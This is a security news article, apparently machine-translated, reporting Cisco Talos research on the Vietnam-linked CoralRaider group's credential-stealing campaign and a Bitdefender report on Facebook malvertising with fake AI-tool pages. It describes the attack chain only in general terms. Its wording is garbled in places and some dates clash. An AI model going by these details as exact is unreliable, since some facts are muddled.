A suspected threat actor of Vietnamese origin has been observed targeting victims in several Asian and Southeast Asian countries with malware designed to collect valuable data since at least May 2023.
Cisco Talos is monitoring the cluster under this name Coral Raider, describing him as financially motivated. The campaign’s targets include India, China, South Korea, Bangladesh, Pakistan, Indonesia and Vietnam.
“This group focuses on stealing victims’ credentials, financial data, and social media accounts, including business and advertising accounts,” said security researchers Chetan Raghuprasad and Joey Chen. “They use RotBot, a custom variant of Quasar RAT, and the XClient stealer as the payload.”
Other core malware used by the group includes a combination of remote access Trojans and information stealers such as AsyncRAT, NetSupport RAT and Rhadamanthys.
Targeting business and advertising accounts has been of particular interest to attackers operating from Vietnam, with various stealer malware families such as Ducktail, NodeStealer and VietCredCare deployed to take control of accounts for further monetization.
The modus operandi involves using Telegram to exfiltrate stolen information from victims’ machines, which is then traded in underground markets to generate illicit revenue.
“The CoralRaider operators are based in Vietnam, based on the actors’ messages in their C2 Telegram bot channels and language preference in naming their bots, PDB strings and other Vietnamese words encoded in the payload binaries,” the researchers said.
Attack chains begin with a Windows shortcut file (LNK), although there is currently no clear explanation as to how these files are distributed to targets.
If the LNK file is opened, an HTML application (HTA) file is downloaded and executed by an attacker-controlled download server, which, in turn, executes an embedded Visual Basic script.
The script, for its part, decrypts and sequentially executes three other PowerShell scripts that are responsible for performing anti-VM and anti-scanning checks, bypassing Windows User Access Control (UAC), disabling Windows notifications and of applications and downloading and running RotBot.
RotBot is configured to contact a Telegram bot and retrieve the XClient stealer malware and execute it in memory, ultimately facilitating the theft of cookies, credentials, and financial information from web browsers such as Brave, Microsoft Edge, Google Chrome, Microsoft Edge, Mozilla Firefox, and the Opera; Discord and Telegram data; and screenshots.
XClient is also designed to steal data from victims’ Facebook, Instagram, TikTok, and YouTube accounts, gathering details about payment methods and permissions associated with their Facebook business and advertising accounts.
“RotBot is a variant of the Quasar RAT client that the threat actor customized and compiled for this campaign,” the researchers said. “[XClient] has extensive information theft capabilities through its plugin module and various modules to perform remote administrative tasks.”
The development comes as Bitdefender revealed details of a malvertising campaign on Facebook that is exploiting the buzz surrounding generative AI tools to push an assortment of information thieves such as Rilide, Vidar, IceRAT and a new entrant known as Nova Stealers.
The starting point of the attack is that the threat actor takes control of an existing Facebook account and modifies its appearance to imitate Google’s well-known artificial intelligence tools, OpenAI and Midjourney, expanding its reach by serving sponsored ads on the platform.
One is the fake page masquerading as Midjourney which had 1.2 million followers before it was removed on March 8, 2023. The threat actors running the page were mainly from Vietnam, the US, Indonesia, the UK and Australia, including the others.
“The malvertising campaigns have enormous reach across the Meta-sponsored advertising system and have actively targeted European users from Germany, Poland, Italy, France, Belgium, Spain, the Netherlands, Romania, Sweden and elsewhere,” he said the Romanian cybersecurity company.